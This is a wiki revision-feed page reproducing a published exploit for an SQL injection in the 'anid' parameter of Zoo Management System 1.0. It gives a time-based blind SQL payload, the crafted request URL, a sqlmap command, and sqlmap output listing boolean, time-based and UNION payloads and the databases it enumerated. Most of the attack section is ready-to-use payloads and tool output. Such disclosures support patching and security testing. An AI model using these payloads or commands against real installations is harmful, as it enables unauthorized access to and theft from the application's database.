https://pwnwiki.com/index.php?action=history&feed=atom&title=Zoo_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9EZoo Management System 1.0 SQL注入漏洞 - Revision history2026-04-20T23:34:36ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=Zoo_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1266&oldid=prevPwnwiki: Created page with "==INFO== <pre> # Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://..."2021-04-08T09:36:22Z<p>Created page with "==INFO== <pre> # Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://..."</p>
<p><b>New page</b></p><div>==INFO==<br />
<pre><br />
# Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection<br />
# Google Dork: N/A<br />
# Date: 29/1/2021<br />
# Exploit Author: Zeyad Azima<br />
# Vendor Homepage: https://phpgurukul.com/<br />
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/<br />
# Version: V1<br />
# Tested on: Windows<br />
<br />
# Identify the vulnerability<br />
<br />
1- go to http://localhost/animals.php and click on an animal<br />
<br />
2- then add the following payload to the url<br />
<br />
payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh<br />
url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh<br />
<br />
If the web server makes you wait 5 seconds then it's vulnerable<br />
<br />
<br />
# Exploit<br />
<br />
Now you can exploit it using sqlmap<br />
<br />
command: sqlmap -u url --dbs<br />
<br />
example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs<br />
___<br />
__H__<br />
___ ___[.]_____ ___ ___ {1.4.10.16#dev}<br />
|_ -| . [.] | .'| . |<br />
|___|_ [)]_|_|_|__,| _|<br />
|_|V... |_| http://sqlmap.org<br />
<br />
[!] legal disclaimer: Usage of sqlmap for attacking targets without<br />
prior mutual consent is illegal. It is the end user's responsibility<br />
to obey all applicable local, state and federal laws. Developers<br />
assume no liability and are not responsible for any misuse or damage<br />
caused by this program<br />
<br />
[*] starting @ 23:05:33 /2021-01-29/<br />
<br />
[23:05:34] [INFO] resuming back-end DBMS 'mysql'<br />
[23:05:34] [INFO] testing connection to the target URL<br />
you have not declared cookie(s), while server wants to set its own<br />
('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n]<br />
y<br />
sqlmap resumed the following injection point(s) from stored session:<br />
---<br />
Parameter: anid (GET)<br />
Type: boolean-based blind<br />
Title: AND boolean-based blind - WHERE or HAVING clause<br />
Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo<br />
<br />
Type: time-based blind<br />
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />
Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND<br />
'jMXh'='jMXh<br />
<br />
Type: UNION query<br />
Title: Generic UNION query (NULL) - 8 columns<br />
Payload: anid=9' UNION ALL SELECT<br />
NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL--<br />
-<br />
---<br />
[23:05:36] [INFO] the back-end DBMS is MySQL<br />
web application technology: Apache 2.4.41, PHP 7.3.10, PHP<br />
back-end DBMS: MySQL >= 5.0.12<br />
[23:05:36] [INFO] fetching database names<br />
available databases [6]:<br />
[*] information_schema<br />
[*] mysql<br />
[*] performance_schema<br />
[*] sys<br />
[*] umspsdb<br />
[*] zmsdb<br />
<br />
[23:05:36] [INFO] fetched data logged to text files under<br />
</pre></div>Pwnwiki